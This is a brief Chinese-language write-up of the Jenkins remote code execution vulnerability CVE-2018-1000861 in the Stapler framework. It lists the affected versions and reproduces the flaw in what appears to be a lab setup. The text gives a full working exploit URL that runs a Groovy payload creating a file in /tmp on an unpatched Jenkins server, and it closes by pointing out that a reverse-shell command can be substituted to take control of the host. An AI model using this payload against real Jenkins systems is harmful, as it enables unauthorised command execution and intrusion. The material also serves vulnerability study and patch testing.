漏洞介紹
Stapler Web框架中的釘書機/core/src/main/java/org/kohsuke/stapler/MetaClass.java中存在一個代碼執行漏洞,攻擊者可以使用該方法調用某些方法通過訪問並非旨在通過這種方式調用的特制URL來訪問Java對象。
影響版本
Jenkins 2.153及更早版本,LTS 2.138.3及更早版本
復現過程
訪問有Jenkins遠程命令執行漏洞(CVE-2018-1000861)的網站首頁
構建特定的url進行命令執行,如在/tmp目錄下創建shell文件
http://192.168.222.196:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){%22touch%20/tmp/shell%22.execute()}}
執行之后可看到沒有回顯,看一下搭建漏洞環境的主機/tmp目錄下成功創建shell文件
注意:可執行反彈shell的命令getshell